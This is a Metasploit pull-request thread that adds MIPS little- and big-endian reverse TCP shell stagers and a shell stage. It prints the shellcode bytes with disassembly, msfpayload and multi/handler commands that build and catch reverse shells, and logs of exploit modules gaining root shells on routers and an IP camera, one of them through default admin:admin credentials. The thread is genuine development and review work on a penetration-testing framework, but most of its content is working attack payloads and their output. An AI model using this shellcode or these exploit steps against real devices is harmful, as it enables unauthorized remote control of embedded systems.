Add shell/reverse_tcp payloads for MIPS (little and big endian)

[jvazquez-r7]

Summary of changes:

• Adds the shell stage compatible for mips be and mips le
• Adds the reverse_tcp stager for mips be (null free)
• Adds the reverse_tcp stager for mips le (null free)
• Adds function to metasm_shell.rb in order to easier the acquisition of the payload strings.

TODO:

• I need to optimize a little bit the stagers. In the next pull request. Time available expired for this pr
• Add bind_tcp stagers. In the next pull request. Time available expired for this pr

Verification

mipsle

• Use msfpayload to create an elf embedding the stager

juans-mbp:metasploit-framework juan$ ./msfpayload linux/mipsle/shell/reverse_tcp LHOST=192.168.172.1 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsle/shell/reverse_tcp
 Length: 212
Options: {"LHOST"=>"192.168.172.1"}

• Execute the msfconsole and use exploit/multi/handler to setup a handler listening for the payload

msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/mipsle/shell/reverse_tcp 
payload => linux/mipsle/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...

• Upload the elf created with msfpayload to a MIPS LE machine, provide +x and execute!

juan@debian:~/test$ ls -la shell.elf 
-rw-r--r-- 1 juan juan 296 Jan  8 23:23 shell.elf
juan@debian:~/test$ chmod +x shell.elf 
juan@debian:~/test$ ./shell.elf

• You should be enjoying a session on the msfconsole

[*] Starting the payload handler...
[*] Sending stage (84 bytes) to 192.168.172.134
[*] Command shell session 3 opened (192.168.172.1:4444 -> 192.168.172.134:59129) at 2014-01-14 14:20:26 -0600

uname -a
Linux debian 2.6.32-5-4kc-malta #1 Fri Feb 15 18:09:19 UTC 2013 mips GNU/Linux
ls
shell.elf
^C
Abort session 3? [y/N]  y

[*] 192.168.172.134 - Command shell session 3 closed.  Reason: User exit

mipsbe

• Use msfpayload to create an elf embedding the stager

juans-mbp:metasploit-framework juan$ ./msfpayload linux/mipsbe/shell/reverse_tcp LHOST=192.168.172.1 X > /tmp/shell.elf
Created by msfpayload (http://www.metasploit.com).
Payload: linux/mipsbe/shell/reverse_tcp
 Length: 212
Options: {"LHOST"=>"192.168.172.1"}

• Execute the msfconsole and use exploit/multi/handler to setup a handler listening for the payload

msf exploit(handler) > set payload linux/mipsbe/shell/reverse_tcp 
payload => linux/mipsbe/shell/reverse_tcp
msf exploit(handler) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(handler) > set lport 4444
lport => 4444
msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.172.1:4444 
[*] Starting the payload handler...

• Upload the elf created with msfpayload to a MIPS BE machine, provide +x and execute!

juan@mipsdebian:~/test$ ls -la
total 12
drwxr-xr-x 2 juan juan 4096 Jan 11 07:29 .
drwxr-xr-x 4 juan juan 4096 Jan 11 07:29 ..
-rw-r--r-- 1 juan juan  296 Jan 11 07:29 shell.elf
juan@mipsdebian:~/test$ chmod +x shell.elf 
juan@mipsdebian:~/test$ ./shell.elf 

• You should be enjoying a session on the msfconsole

[*] Starting the payload handler...
[*] Sending stage (84 bytes) to 192.168.172.134
[*] Command shell session 4 opened (192.168.172.1:4444 -> 192.168.172.134:59130) at 2014-01-14 14:23:25 -0600

uname -a
Linux mipsdebian 2.6.32-5-4kc-malta #1 Sat Feb 16 12:43:42 UTC 2013 mips GNU/Linux
ls
shell.elf
file shell.elf
shell.elf: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, corrupted section header size

payload generation with tools/metasm_shell.rb

• Run tools/metasm_shell.rb with the -a mips -e big options, the shell should appears:

juans-mbp:metasploit-framework juan$ tools/metasm_shell.rb -a mips -e big 
type "exit" or "quit" to quit
use ";" or "\n" for newline
type "file <file>" to parse a GAS assembler source file

metasm > 

• VERIFY which there is a new line about how to use the shell:

type "file <file>" to parse a GAS assembler source file

• execute file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s (adjust the path if necessary), the next output should be received:

metasm > file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
Reading file external/source/shellcode/linux/mipsbe/stager_sock_reverse.s
buf = 
"\x24\x0f\xff\xfa\x01\xe0\x78\x27\x21\xe4\xff\xfd\x21\xe5" +
"\xff\xfd\x28\x06\xff\xff\x24\x02\x10\x57\x01\x01\x01\x0c" +
"\xaf\xa2\xff\xfc\x8f\xa4\xff\xfc\x24\x0f\xff\xfd\x01\xe0" +
"\x78\x27\xaf\xaf\xff\xe0\x3c\x0e\x11\x5c\xaf\xae\xff\xe4" +
"\x3c\x0e\x7f\x00\x35\xce\x00\x01\xaf\xae\xff\xe6\x27\xa5" +
"\xff\xe2\x24\x0c\xff\xef\x01\x80\x30\x27\x24\x02\x10\x4a" +
"\x01\x01\x01\x0c\x24\x04\xff\xff\x24\x05\x10\x01\x20\xa5" +
"\xff\xff\x24\x09\xff\xf8\x01\x20\x48\x27\x01\x20\x30\x20" +
"\x24\x07\x08\x02\x24\x0b\xff\xea\x01\x60\x58\x27\x03\xab" +
"\x58\x20\xad\x60\xff\xff\xad\x62\xff\xfb\x24\x02\x0f\xfa" +
"\x01\x01\x01\x0c\xaf\xa2\xff\xf8\x8f\xa4\xff\xfc\x8f\xa5" +
"\xff\xf8\x24\x06\x10\x01\x20\xc6\xff\xff\x24\x02\x0f\xa3" +
"\x01\x01\x01\x0c\x8f\xa4\xff\xf8\x00\x40\x28\x20\x24\x09" +
"\xff\xfd\x01\x20\x48\x27\x01\x20\x30\x20\x24\x02\x10\x33" +
"\x01\x01\x01\x0c\x8f\xb1\xff\xf8\x8f\xb2\xff\xfc\x02\x20" +
"\xf8\x09"



entrypoint_0:
    li $t7, -6                                   ; @0  240ffffa  
    not $t7, $t7                                 ; @4  01e07827  
    addi $a0, $t7, -3                            ; @8  21e4fffd  
    addi $a1, $t7, -3                            ; @0ch  21e5fffd  
    slti $a2, $zero, -1                          ; @10h  2806ffff  
    li $v0, 1057h                                ; @14h  24021057  
    syscall 40404h                               ; @18h  0101010c  
    sw $v0, -4($sp)                              ; @1ch  afa2fffc  
    lw $a0, -4($sp)                              ; @20h  8fa4fffc  
    li $t7, -3                                   ; @24h  240ffffd  
    not $t7, $t7                                 ; @28h  01e07827  
    sw $t7, -20h($sp)                            ; @2ch  afafffe0  
    lui $t6, 115ch                               ; @30h  3c0e115c  
    sw $t6, -1ch($sp)                            ; @34h  afaeffe4  
    lui $t6, 7f00h                               ; @38h  3c0e7f00  
    ori $t6, $t6, 1                              ; @3ch  35ce0001  
    sw $t6, -1ah($sp)                            ; @40h  afaeffe6  
    addiu $a1, $sp, -1eh                         ; @44h  27a5ffe2  
    li $t4, -11h                                 ; @48h  240cffef  
    not $a2, $t4                                 ; @4ch  01803027  
    li $v0, 104ah                                ; @50h  2402104a  
    syscall 40404h                               ; @54h  0101010c  
    li $a0, -1                                   ; @58h  2404ffff  
    li $a1, 1001h                                ; @5ch  24051001  
    addi $a1, $a1, -1                            ; @60h  20a5ffff  
    li $t1, -8                                   ; @64h  2409fff8  
    not $t1, $t1                                 ; @68h  01204827  
    add $a2, $t1, $zero                          ; @6ch  01203020  
    li $a3, 802h                                 ; @70h  24070802  
    li $t3, -16h                                 ; @74h  240bffea  
    not $t3, $t3                                 ; @78h  01605827  
    add $t3, $sp, $t3                            ; @7ch  03ab5820  
    sw $zero, -1($t3)                            ; @80h  ad60ffff  
    sw $v0, -5($t3)                              ; @84h  ad62fffb  
    li $v0, 0ffah                                ; @88h  24020ffa  
    syscall 40404h                               ; @8ch  0101010c  
    sw $v0, -8($sp)                              ; @90h  afa2fff8  
    lw $a0, -4($sp)                              ; @94h  8fa4fffc  
    lw $a1, -8($sp)                              ; @98h  8fa5fff8  
    li $a2, 1001h                                ; @9ch  24061001  
    addi $a2, $a2, -1                            ; @0a0h  20c6ffff  
    li $v0, 0fa3h                                ; @0a4h  24020fa3  
    syscall 40404h                               ; @0a8h  0101010c  
    lw $a0, -8($sp)                              ; @0ach  8fa4fff8  
    add $a1, $v0, $zero                          ; @0b0h  00402820  
    li $t1, -3                                   ; @0b4h  2409fffd  
    not $t1, $t1                                 ; @0b8h  01204827  
    add $a2, $t1, $zero                          ; @0bch  01203020  
    li $v0, 1033h                                ; @0c0h  24021033  
    syscall 40404h                               ; @0c4h  0101010c  
    lw $s1, -8($sp)                              ; @0c8h  8fb1fff8  
    lw $s2, -4($sp)                              ; @0cch  8fb2fffc  
    jalr $s1                                     ; @0d0h  0220f809  noreturn

• VERIFY which the buf ruby string is the same than the one included on payloads/stagers/linux/mipsbe/reverse_tcp.rb
• execute file external/source/shellcode/linux/mips/stage_tcp_shell.s (adjust the path if necessary), the next output should be received:

metasm > file external/source/shellcode/linux/mips/stage_tcp_shell.s
Reading file external/source/shellcode/linux/mips/stage_tcp_shell.s
buf = 
"\x24\x11\xff\xfd\x02\x20\x88\x27\x02\x40\x20\x20\x02\x20" +
"\x28\x20\x24\x02\x0f\xdf\x01\x01\x01\x0c\x24\x10\xff\xff" +
"\x22\x31\xff\xff\x16\x11\xff\xfa\x24\x18\xff\xff\x07\x10" +
"\xff\xff\x28\x18\xff\xff\x23\xe4\x00\x1c\xaf\xa4\xff\xf8" +
"\xaf\xa0\xff\xfc\x23\xa5\xff\xf8\x28\x06\xff\xff\x24\x02" +
"\x0f\xab\x01\x01\x01\x0c"



entrypoint_0:
    li $s1, -3                                   ; @0  2411fffd  
    not $s1, $s1                                 ; @4  02208827  
    add $a0, $s2, $zero                          ; @8  02402020  



// Xrefs: 20h
loc_0ch:
    add $a1, $s1, $zero                          ; @0ch  02202820  
    li $v0, 0fdfh                                ; @10h  24020fdf  
    syscall 40404h                               ; @14h  0101010c  
    li $s0, -1                                   ; @18h  2410ffff  
    addi $s1, $s1, -1                            ; @1ch  2231ffff  
    bne $s1, $s0, loc_0ch                        ; @20h  1611fffa  x:loc_0ch
    li $t8, -1                                   ; @24h  2418ffff  



// Xrefs: 28h
loc_28h:
    bltzal $t8, loc_28h                          ; @28h  0710ffff  noreturn x:loc_28h
    slti $t8, $zero, -1                          ; @2ch  2818ffff  


    addi $a0, $ra, 1ch                           ; @30h  23e4001c  
    sw $a0, -8($sp)                              ; @34h  afa4fff8  
    sw $zero, -4($sp)                            ; @38h  afa0fffc  
    addi $a1, $sp, -8                            ; @3ch  23a5fff8  
    slti $a2, $zero, -1                          ; @40h  2806ffff  
    li $v0, 0fabh                                ; @44h  24020fab  
    syscall 40404h                               ; @48h  0101010c  

• VERIFY which the buf ruby string is the same than the one included on payloads/stages/linux/mipsbe/shell.rb, minus the "\x2f\x62\x69\x6e\x2f\x73\x68\x00" suffix. (It's the "/bin/sh" string which isn't disassembled by metasm)
• Type exit to exit the metasm shell
• Run tools/metasm_shell.rb with the -a mips -e little options, the shell should appears:
• execute file external/source/shellcode/linux/mipsle/stager_sock_reverse.s (adjust the path if necessary), the next output should be received:

metasm > file external/source/shellcode/linux/mipsle/stager_sock_reverse.s
Reading file external/source/shellcode/linux/mipsle/stager_sock_reverse.s
buf = 
"\xfa\xff\x0f\x24\x27\x78\xe0\x01\xfd\xff\xe4\x21\xfd\xff" +
"\xe5\x21\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x01\x01\x01" +
"\xfc\xff\xa2\xaf\xfc\xff\xa4\x8f\xfd\xff\x0f\x24\x27\x78" +
"\xe0\x01\xe2\xff\xaf\xaf\x11\x5c\x0e\x34\xe4\xff\xae\xaf" +
"\x00\x01\x0e\x3c\x7f\x00\xce\x35\xe6\xff\xae\xaf\xe2\xff" +
"\xa5\x27\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24" +
"\x0c\x01\x01\x01\xff\xff\x04\x24\x01\x10\x05\x24\xff\xff" +
"\xa5\x20\xf8\xff\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01" +
"\x02\x08\x07\x24\xea\xff\x0b\x24\x27\x58\x60\x01\x20\x58" +
"\xab\x03\xff\xff\x60\xad\xfb\xff\x62\xad\xfa\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa2\xaf\xfc\xff\xa4\x8f\xf8\xff" +
"\xa5\x8f\x01\x10\x06\x24\xff\xff\xc6\x20\xa3\x0f\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xa4\x8f\x20\x28\x40\x00\xfd\xff" +
"\x09\x24\x27\x48\x20\x01\x20\x30\x20\x01\x33\x10\x02\x24" +
"\x0c\x01\x01\x01\xf8\xff\xb1\x8f\xfc\xff\xb2\x8f\x09\xf8" +
"\x20\x02"



entrypoint_0:
    li $t7, -6                                   ; @0  faff0f24  
    not $t7, $t7                                 ; @4  2778e001  
    addi $a0, $t7, -3                            ; @8  fdffe421  
    addi $a1, $t7, -3                            ; @0ch  fdffe521  
    slti $a2, $zero, -1                          ; @10h  ffff0628  
    li $v0, 1057h                                ; @14h  57100224  
    syscall 40404h                               ; @18h  0c010101  
    sw $v0, -4($sp)                              ; @1ch  fcffa2af  
    lw $a0, -4($sp)                              ; @20h  fcffa48f  
    li $t7, -3                                   ; @24h  fdff0f24  
    not $t7, $t7                                 ; @28h  2778e001  
    sw $t7, -1eh($sp)                            ; @2ch  e2ffafaf  
    li $t6, 5c11h                                ; @30h  115c0e34  
    sw $t6, -1ch($sp)                            ; @34h  e4ffaeaf  
    lui $t6, 100h                                ; @38h  00010e3c  
    ori $t6, $t6, 7fh                            ; @3ch  7f00ce35  
    sw $t6, -1ah($sp)                            ; @40h  e6ffaeaf  
    addiu $a1, $sp, -1eh                         ; @44h  e2ffa527  
    li $t4, -11h                                 ; @48h  efff0c24  
    not $a2, $t4                                 ; @4ch  27308001  
    li $v0, 104ah                                ; @50h  4a100224  
    syscall 40404h                               ; @54h  0c010101  
    li $a0, -1                                   ; @58h  ffff0424  
    li $a1, 1001h                                ; @5ch  01100524  
    addi $a1, $a1, -1                            ; @60h  ffffa520  
    li $t1, -8                                   ; @64h  f8ff0924  
    not $t1, $t1                                 ; @68h  27482001  
    add $a2, $t1, $zero                          ; @6ch  20302001  
    li $a3, 802h                                 ; @70h  02080724  
    li $t3, -16h                                 ; @74h  eaff0b24  
    not $t3, $t3                                 ; @78h  27586001  
    add $t3, $sp, $t3                            ; @7ch  2058ab03  
    sw $zero, -1($t3)                            ; @80h  ffff60ad  
    sw $v0, -5($t3)                              ; @84h  fbff62ad  
    li $v0, 0ffah                                ; @88h  fa0f0224  
    syscall 40404h                               ; @8ch  0c010101  
    sw $v0, -8($sp)                              ; @90h  f8ffa2af  
    lw $a0, -4($sp)                              ; @94h  fcffa48f  
    lw $a1, -8($sp)                              ; @98h  f8ffa58f  
    li $a2, 1001h                                ; @9ch  01100624  
    addi $a2, $a2, -1                            ; @0a0h  ffffc620  
    li $v0, 0fa3h                                ; @0a4h  a30f0224  
    syscall 40404h                               ; @0a8h  0c010101  
    lw $a0, -8($sp)                              ; @0ach  f8ffa48f  
    add $a1, $v0, $zero                          ; @0b0h  20284000  
    li $t1, -3                                   ; @0b4h  fdff0924  
    not $t1, $t1                                 ; @0b8h  27482001  
    add $a2, $t1, $zero                          ; @0bch  20302001  
    li $v0, 1033h                                ; @0c0h  33100224  
    syscall 40404h                               ; @0c4h  0c010101  
    lw $s1, -8($sp)                              ; @0c8h  f8ffb18f  
    lw $s2, -4($sp)                              ; @0cch  fcffb28f  
    jalr $s1                                     ; @0d0h  09f82002  noreturn

• VERIFY which the buf ruby string is the same than the one included on payloads/stagers/linux/mipsle/shell/reverse_tcp.rb payloads/stagers/linux/mipsle/reverse_tcp.rb
• execute file external/source/shellcode/linux/mips/stage_tcp_shell.s (adjust the path if necessary), the next output should be received:

metasm > file external/source/shellcode/linux/mips/stage_tcp_shell.s
Reading file external/source/shellcode/linux/mips/stage_tcp_shell.s
buf = 
"\xfd\xff\x11\x24\x27\x88\x20\x02\x20\x20\x40\x02\x20\x28" +
"\x20\x02\xdf\x0f\x02\x24\x0c\x01\x01\x01\xff\xff\x10\x24" +
"\xff\xff\x31\x22\xfa\xff\x11\x16\xff\xff\x18\x24\xff\xff" +
"\x10\x07\xff\xff\x18\x28\x1c\x00\xe4\x23\xf8\xff\xa4\xaf" +
"\xfc\xff\xa0\xaf\xf8\xff\xa5\x23\xff\xff\x06\x28\xab\x0f" +
"\x02\x24\x0c\x01\x01\x01"



entrypoint_0:
    li $s1, -3                                   ; @0  fdff1124  
    not $s1, $s1                                 ; @4  27882002  
    add $a0, $s2, $zero                          ; @8  20204002  



// Xrefs: 20h
loc_0ch:
    add $a1, $s1, $zero                          ; @0ch  20282002  
    li $v0, 0fdfh                                ; @10h  df0f0224  
    syscall 40404h                               ; @14h  0c010101  
    li $s0, -1                                   ; @18h  ffff1024  
    addi $s1, $s1, -1                            ; @1ch  ffff3122  
    bne $s1, $s0, loc_0ch                        ; @20h  faff1116  x:loc_0ch
    li $t8, -1                                   ; @24h  ffff1824  



// Xrefs: 28h
loc_28h:
    bltzal $t8, loc_28h                          ; @28h  ffff1007  noreturn x:loc_28h
    slti $t8, $zero, -1                          ; @2ch  ffff1828  


    addi $a0, $ra, 1ch                           ; @30h  1c00e423  
    sw $a0, -8($sp)                              ; @34h  f8ffa4af  
    sw $zero, -4($sp)                            ; @38h  fcffa0af  
    addi $a1, $sp, -8                            ; @3ch  f8ffa523  
    slti $a2, $zero, -1                          ; @40h  ffff0628  
    li $v0, 0fabh                                ; @44h  ab0f0224  
    syscall 40404h                               ; @48h  0c010101  

• VERIFY which the buf ruby string is the same than the one included on payloads/stages/linux/mipsle/shell.rb, minus the "\x2f\x62\x69\x6e\x2f\x73\x68\x00" suffix. (It's the "/bin/sh" string which isn't disassembled by metasm)

Extra validation step

• Use the payloads on existent modules for real vulns :) enjoy shells! Example:

msf exploit(linksys_wrt110_cmd_exec) > show options

Module options (exploit/linux/http/linksys_wrt110_cmd_exec):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD  admin            no        Password to login with
   Proxies                    no        Use a proxy chain
   RHOST     192.168.1.1      yes       The address of the router
   RPORT     80               yes       The target port
   TIMEOUT   20               no        The timeout to use in every request
   USERNAME  admin            yes       Valid router administrator username
   VHOST                      no        HTTP server virtual host


Payload options (linux/mipsle/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.100    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux mipsel Payload


msf exploit(linksys_wrt110_cmd_exec) > exploit

[*] Started reverse handler on 192.168.1.100:4444 
[*] 192.168.1.1:80 - Trying to login with admin:admin
[+] 192.168.1.1:80 - Successful login admin:admin
Executable here: /tmp/UxZdC
[*] Sending stage (84 bytes) to 192.168.1.1
[*] Command shell session 1 opened (192.168.1.100:4444 -> 192.168.1.1:32778) at 2014-01-14 13:55:15 -0600
ls

[*] Command Stager progress - 100.00% done (1536/1536 bytes)

AdminDiag.htm
AdminManage.htm
AdminRebootConfig_Clicked.htm
AdminRebootConfig_Clicked_reboot.htm
AdminReport.htm
AdminRestore.htm

[mandreko]

To help test these out, I merged them into my local branch for PR #2874

Below are the results:

mipsbe

msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.1      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsbe/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.136    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   9   Netgear WPNT834


msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.1.136:4444
[*] Sending stage (84 bytes) to 192.168.1.1
[*] Command shell session 1 opened (192.168.1.136:4444 -> 192.168.1.136:3575) at 2014-01-14 16:15:56 -0500
[*] Command Stager progress - 100.00% done (1264/1264 bytes)

ls -al /
drwxr-xr-x    1 root     root          657 Dec 18  2005 bin
drwxr-xr-x    1 root     root          565 Dec 18  2005 dev
drwxr-xr-x    1 root     root          285 Dec 18  2005 etc
drwxr-xr-x    1 root     root            0 Dec 18  2005 home
drwxr-xr-x    1 root     root         3947 Dec 18  2005 htdocs
drwxr-xr-x    1 root     root          387 Dec 18  2005 lib
drwxr-xr-x    1 root     root            0 Dec 18  2005 mnt
dr-xr-xr-x   40 root     root            0 Dec 31  1999 proc
lrwxrwxrwx    1 root     root            3 Dec 18  2005 sbin -> bin
lrwxrwxrwx    1 root     root            7 Dec 18  2005 tmp -> var/tmp
drwxr-xr-x    1 root     root           21 Dec 18  2005 usr
drwxr-xr-x    1 root     root            0 Dec 31  1999 var

mipsle

msf exploit(sercomm_exec) > show options

Module options (exploit/linux/misc/sercomm_exec):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.1.2      yes       The target address
   RPORT  32764            yes       The target port


Payload options (linux/mipsle/shell/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.136    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   3   Honeywell WAP-PL2 IP Camera


msf exploit(sercomm_exec) > exploit

[*] Started reverse handler on 192.168.1.136:4444
[*] Sending stage (84 bytes) to 192.168.1.2
[*] Command shell session 2 opened (192.168.1.136:4444 -> 192.168.1.2:4576) at 2014-01-14 16:21:05 -0500
[*] Command Stager progress - 100.00% done (1555/1555 bytes)

ls -al /
drwxrwxr-x   11 root     root           95 Sep  9  2011 .
drwxrwxr-x   11 root     root           95 Sep  9  2011 ..
drwxrwxr-x    2 root     root          276 Sep  9  2011 bin
drwxr-xr-x    3 root     root          646 Sep  9  2011 dev
drwxrwxr-x   10 root     root         1073 Sep  9  2011 etc
drwxrwxr-x    3 root     root          774 Sep  9  2011 lib
dr-xr-xr-x   55 root     root            0 Jan  1  2000 proc
drwxr-xr-x    2 root     root          172 Sep  9  2011 sbin
drwxr-xr-x    6 root     root            0 Jan 14 21:20 tmp
drwxrwxr-x    9 root     root           81 Sep  9  2011 usr
drwxr-xr-x    9 root     root            0 Jan  1  2010 var

[jvennix-r7]

Processing...

[jvennix-r7]

Shell session from mipsel:

msf exploit(handler) > [*] Sending stage (84 bytes) to 10.6.0.125
[*] Command shell session 1 opened (10.6.0.125:4444 -> 10.6.0.125:57177) at 2014-01-15 12:
23:43 -0600
uname -a
[*] exec: uname -a

Darwin aus-mac-1073.aus.rapid7.com 12.5.0 Darwin Kernel Version 12.5.0: Mon Jul 29 16:33:4
9 PDT 2013; root:xnu-2050.48.11~1/RELEASE_X86_64 x86_64

[jvennix-r7]

mipsbe working well

msf exploit(handler) > [*] Sending stage (84 bytes) to 10.6.0.125
[*] Command shell session 2 opened (10.6.0.125:4444 -> 10.6.0.125:57184) at 2014-01-15 12:
27:13 -0600

msf exploit(handler) > sessions -i 2 -c "uname -a"
[*] Running 'uname -a' on shell session 2 (10.6.0.125)
Linux debian-mips 2.6.32-5-4kc-malta #1 Wed Jan 12 11:14:32 UTC 2011 mips GNU/Linux

[jvennix-r7]

@jvazquez-r7 I am stuck on one of these steps:

VERIFY which the buf ruby string is the same than the one included on payloads/stagers/linux/mipsle/shell/reverse_tcp.rb

but that file does not exist in the repo

[jvazquez-r7]

sorry @jvennix-r7 , you're right, it should be: payloads/stagers/linux/mipsle/reverse_tcp.rb thanks!

[jvennix-r7]

The mipsle and mipsbe stagers are very similar, maybe we should use gas's .def macros here instead of having two separate files?

@@ -57,11 +60,11 @@
  lw      $a0, -4($sp)
  li      $t7, -3
  nor     $t7, $t7, $zero
- sw      $t7, -32($sp)
- lui     $t6, 0x115c
+ sw      $t7, -30($sp)
+ ori     $t6, $zero, 0x5c11  # port
  sw      $t6, -28($sp)
- lui     $t6, 0x7f00          # ip
- ori     $t6, $t6, 0x0001     # ip
+ lui     $t6, 0x100          # ip
+ ori     $t6, $t6, 0x7f      # ip
  sw      $t6, -26($sp)
  addiu   $a1, $sp, -30
  li      $t4, -17
@@ -120,7 +123,7 @@

[jvennix-r7]

I see now in the PR "I need to optimize a little bit the stagers. In the next pull request. Time available expired for this pr", so assuming this kind of stuff will be considered later. Merging now..

[jvazquez-r7]

yeah, I can do for sure in the next pull request, but yeah, honestly didn't have into account in this pr because wasn't aware of an easy trick to have into account endianess with .def macros :S guidance super welcome, and I can add it for sure asap!

[jvennix-r7]

I will count @mandreko's field testing as verifying that last checkbox :)

[jvazquez-r7]

@jvennix-r7 honestly, don't know how to do the proposed chance change to have into account endianess with .def macros, what a shame, do you mind to share reference or a sample with me :?